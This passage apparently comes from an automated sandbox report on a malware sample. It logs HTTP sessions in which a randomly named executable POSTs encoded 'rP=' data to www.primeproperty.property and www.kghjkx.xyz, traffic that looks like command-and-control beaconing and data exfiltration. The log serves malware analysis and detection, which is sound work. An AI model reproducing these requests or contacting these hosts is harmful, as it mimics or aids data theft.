                                                                                      Data Ascii: rP=ZU9pjJTMzahpur3Qy4pG+8wQSVff5P5HTaQF3fg6NSZL0QJcb36diZRNjE0dw3R/k/KMAqGLlXm4eqkdG/4f1jo+rL3JE0qPxpEZvNuOqRjduSmQriXk0TWbj/BfMAjoIsFf9br/rxxIl6dgvZY0AmA/Y/CJaK7OloX2OMz5EAiWowt4b8gQ42zEVOmxP5EYuVW5N69i/ZawskeLBRAWiiY=
                                                                                      Nov 13, 2024 09:28:26.498707056 CET717INHTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:26 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.459108113.20.119.31802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:27.977755070 CET10918OUTPOST /c1ti/ HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.primeproperty.property
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.primeproperty.property/c1ti/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 42 4c 30 69 52 63 5a 57 36 64 6a 5a 52 4e 71 6b 30 41 77 33 52 59 6b 37 75 49 41 72 36 39 6c 56 65 34 59 4a 73 64 54 36 4d 66 2f 6a 6f 2b 30 62 33 45 62 6b 71 57 78 70 55 56 76 4e 2b 4f 71 52 6a 64 75 51 75 51 73 32 44 6b 32 54 57 55 6b 2f 42 44 49 41 6a 51 49 73 64 50 39 62 66 76 6f 42 52 49 67 72 74 67 38 62 41 30 63 32 41 78 55 66 44 61 61 4b 6e 52 6c 6f 4c 63 4f 49 37 44 45 48 4b 57 71 6c 51 2f 47 49 74 4f 76 55 6a 4b 4f 75 71 38 41 75 77 76 6e 69 6d 54 4d 62 68 70 72 4b 71 6b 32 47 37 68 59 51 49 53 31 56 41 76 57 48 4a 41 36 4b 54 34 57 37 65 62 31 59 30 49 64 69 50 6f 55 46 35 4c 6d 74 2f 41 4e 75 4c 42 68 61 6d 6c 33 62 52 57 31 75 79 58 4e 59 37 32 62 59 75 49 77 79 58 69 74 77 31 75 44 68 6e 4e 77 47 50 7a 44 4c 61 41 53 37 59 36 58 55 73 67 56 75 30 6e 74 63 47 63 56 79 4c 36 46 62 36 69 4b 6e 56 69 5a 78 6b 43 54 63 4e 4b 4b 50 54 43 72 2f 46 70 32 67 49 [TRUNCATED]
                                                                                      Data Ascii: rP=ZU9pjJTMzahpur3Qy4pG+8wQSVff5P5HTaQF3fg6NSBL0iRcZW6djZRNqk0Aw3RYk7uIAr69lVe4YJsdT6Mf/jo+0b3EbkqWxpUVvN+OqRjduQuQs2Dk2TWUk/BDIAjQIsdP9bfvoBRIgrtg8bA0c2AxUfDaaKnRloLcOI7DEHKWqlQ/GItOvUjKOuq8AuwvnimTMbhprKqk2G7hYQIS1VAvWHJA6KT4W7eb1Y0IdiPoUF5Lmt/ANuLBhaml3bRW1uyXNY72bYuIwyXitw1uDhnNwGPzDLaAS7Y6XUsgVu0ntcGcVyL6Fb6iKnViZxkCTcNKKPTCr/Fp2gINyFyvEZLJehskn+LUsd3r7EEXcpYO/FPiQz+4tLJh8WpnsABiS17kpqo+j6PrXzVtUob011EpT/8DxCULg6UcMfk1oiJFCl2AM9M6p0IE/kAXE25VCoBDbNPeUPo6rf6I6/tfnwJjG9TaI2y7v9cfByddXBIWvo7rEB0qqp3RrjLJr2nRGbhbyeoEst+Iop3kl6E44idD9RnJdOCIQyocCq0M+IeyMZawlESoCbBBkz2D57JhSmwpOAk7KORAaJC2rfWrtU4F420XiZ0Wy8Gv3C8WOJ4eviUlDcJmwbNr+T27Yrwa9w6ajTj5oswG0KUtk12HJAWvGNnem3aS24fhZQV/X1NCWXa/+u3oaizNMsWmqEyUUtMUG6uDfxCIfWnOG3w0L8kV+bNpYYSeu8te87E48XyQu0gQUpyJhCKH16LwELMuL7J2e4VOnmwRllZt5kU9rV0qjnbwb9S07s46iAxO+CfMYwWzySeMeTz6lfJmDZ1TxwNN0H9FYHuDGVdkDrEMzwx3gblkWFoGDlrXibqq8vFirB4YTuApCTJduxTjmnJWHxowl2NwOlNSY0d3W8MupuFPWHy+MMbfXIyRCxAY4nQ8zmcnQJ/9JRLH3GTEjeVEIqWdt8XSiZlN2ccu3Cfmjdazfx3cyxOEj94Z/qgWpCPfC+WVo [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:29.091928959 CET717INHTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:28 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.459109113.20.119.31802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:30.516690016 CET536OUTGET /c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:31.599441051 CET717INHTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:31 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.45911047.129.103.185802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:37.267333984 CET780OUTPOST /usop/ HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.kghjkx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.kghjkx.xyz/usop/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 6d 4d 54 34 47 57 6d 5a 37 31 55 6e 4d 71 42 51 33 4c 5a 51 35 41 5a 36 7a 4f 5a 61 4b 6e 30 53 2f 51 63 62 50 6e 61 52 51 46 4f 75 54 39 48 46 75 57 35 39 73 53 65 74 6c 4a 72 6b 30 49 50 4d 73 48 63 44 30 41 78 4f 6c 45 66 42 73 4f 4c 57 79 35 69 74 55 77 57 2b 2f 74 32 4c 57 59 2b 67 65 31 75 61 75 68 63 31 76 4d 42 55 39 75 38 36 47 39 6d 72 4e 79 68 4d 45 5a 64 38 47 65 30 64 53 37 64 31 46 6b 43 6c 2b 52 65 5a 39 6a 34 41 48 41 64 44 43 45 6e 61 58 38 6a 68 50 6c 4e 4a 4a 51 47 55 2b 7a 54 73 32 53 61 56 47 71 76 2b 54 73 6e 2f 77 3d 3d
                                                                                      Data Ascii: rP=6Ez30ZWXMUnDmmMT4GWmZ71UnMqBQ3LZQ5AZ6zOZaKn0S/QcbPnaRQFOuT9HFuW59sSetlJrk0IPMsHcD0AxOlEfBsOLWy5itUwW+/t2LWY+ge1uauhc1vMBU9u86G9mrNyhMEZd8Ge0dS7d1FkCl+ReZ9j4AHAdDCEnaX8jhPlNJJQGU+zTs2SaVGqv+Tsn/w==
                                                                                      Nov 13, 2024 09:28:38.252922058 CET398INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:38 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      30192.168.2.45911147.129.103.185802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:39.799820900 CET800OUTPOST /usop/ HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.kghjkx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.kghjkx.xyz/usop/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 33 30 53 66 67 63 61 4c 4c 61 63 77 46 4f 68 7a 39 47 47 65 57 79 39 74 76 68 74 6e 64 72 6b 30 63 50 4d 70 37 63 66 54 55 2b 50 31 45 64 4f 4d 4f 4a 63 53 35 69 74 55 77 57 2b 2f 35 63 4c 57 77 2b 67 72 6c 75 61 4c 56 66 32 76 4d 43 54 39 75 38 72 32 39 59 72 4e 79 50 4d 42 6c 37 38 44 61 30 64 53 72 64 30 55 6b 42 76 2b 52 45 47 74 69 49 54 47 70 5a 4b 68 56 75 62 6d 6f 2b 2b 72 51 72 42 76 64 63 46 50 53 45 2b 32 32 70 49 42 6a 62 7a 51 52 75 6b 36 31 36 4e 64 42 66 44 58 57 55 45 44 6e 66 68 6d 58 6c 7a 75 6f 3d
                                                                                      Data Ascii: rP=6Ez30ZWXMUnDmGcT0FOmQ71TosqBaXLdQ48Z62vcac30SfgcaLLacwFOhz9GGeWy9tvhtndrk0cPMp7cfTU+P1EdOMOJcS5itUwW+/5cLWw+grluaLVf2vMCT9u8r29YrNyPMBl78Da0dSrd0UkBv+REGtiITGpZKhVubmo++rQrBvdcFPSE+22pIBjbzQRuk616NdBfDXWUEDnfhmXlzuo=
                                                                                      Nov 13, 2024 09:28:40.792073965 CET398INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:40 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      31192.168.2.45911247.129.103.185802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:42.330967903 CET10882OUTPOST /usop/ HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.kghjkx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.kghjkx.xyz/usop/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 2f 30 53 75 41 63 56 4b 4c 61 54 51 46 4f 6f 54 39 62 47 65 57 76 39 74 32 6f 74 6e 51 65 6b 79 51 50 65 62 44 63 54 79 55 2b 45 31 45 64 46 73 4f 4b 57 79 34 36 74 55 67 53 2b 2f 70 63 4c 57 77 2b 67 73 64 75 64 65 68 66 36 50 4d 42 55 39 75 77 36 47 39 6a 72 4a 65 35 4d 41 52 4e 37 33 75 30 45 7a 62 64 33 6d 38 42 6e 2b 52 61 46 74 69 51 54 47 31 57 4b 6e 78 49 62 6d 63 45 2b 73 34 72 43 4a 52 4b 41 75 43 2b 6e 46 69 45 56 43 62 34 79 67 45 6f 6a 59 56 47 63 39 35 46 58 44 6a 35 50 54 57 33 2b 58 4c 6c 6e 62 64 67 49 43 30 71 46 32 77 7a 6d 31 51 30 32 53 46 52 36 39 54 38 63 58 47 5a 61 75 6d 6c 6c 73 33 47 74 47 42 4e 63 4b 39 52 49 5a 4c 4c 39 48 6a 35 50 2b 36 5a 6f 6d 57 41 79 4b 78 5a 38 4b 65 7a 64 43 57 54 51 6f 51 42 79 4d 41 43 69 33 48 36 47 4f 6a 7a 79 49 43 59 79 6e 33 33 6f 43 46 70 43 57 4c 79 35 74 54 6a 6d 45 33 68 69 66 4a 76 78 39 5a 38 50 41 56 [TRUNCATED]
                                                                                      Data Ascii: rP=6Ez30ZWXMUnDmGcT0FOmQ71TosqBaXLdQ48Z62vcac/0SuAcVKLaTQFOoT9bGeWv9t2otnQekyQPebDcTyU+E1EdFsOKWy46tUgS+/pcLWw+gsdudehf6PMBU9uw6G9jrJe5MARN73u0Ezbd3m8Bn+RaFtiQTG1WKnxIbmcE+s4rCJRKAuC+nFiEVCb4ygEojYVGc95FXDj5PTW3+XLlnbdgIC0qF2wzm1Q02SFR69T8cXGZaumlls3GtGBNcK9RIZLL9Hj5P+6ZomWAyKxZ8KezdCWTQoQByMACi3H6GOjzyICYyn33oCFpCWLy5tTjmE3hifJvx9Z8PAV56RKkAr0Vqalbhd1wkZUwhXJpBEOAovvMk/v+N5nhFd9Zv4bUJ584oeNPWqI9rtN7BgLQ9p4PJjsl/itDOlS/bJVaPLEHpC3r7Nly+cGuSnc5r360xPjXSLYQ1+aFj+9tkpuHlznJJ9UbwfqZQdJ0b6asMEt+XI0JeLfNZVDfpjwXosOqIEXjlB9imB6r1ONmvgorO4z91qpO5HswmVWmTVAUaWaYORzdeP98Jkfnki9rb2Y/h22P5kQYgoqIpri3J0T9KVw8wtIxGgR2km92RQDaTOyWoQFnLZWPHNORUIuWSvwwkSlGbY+PUGsR6CzW0pBcEAOIEDvPNSHSZJ43cBw9n82URMHGrejw1iQcSPfwLf8T4ox2boRkmSiCS89LU0yPaUEkGEgecfi50bIuUxnP31YrCl9oEvtBVXCcEvZqzixGb5PO7NUWZv5FXAjkWFNGc20RKZucH27DF2PwM38NZgH/tw7KcuMLKuhYYKnHHRmkx1vpFp2XW4xof9FzffgZzvDxWoHbBgYgzauHb1BUhSlJKUZ8w6ppswyedaZKg/8FIn+zQzJhjDDvxs/MjziwDfkgua7F3K7WCgBZ95uLrNj0DUX4eC4PTx0jCP9P4NqxPDen7Xs0e6/vhnd4kGSIGPTYa325IVtEGlLGc3vEv7v2bqhxF [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:43.362481117 CET398INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      32192.168.2.45911347.129.103.185802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:44.866463900 CET524OUTGET /usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:45.854818106 CET542INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:45 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql
                                                                                      Strict-Transport-Security: max-age=31536000
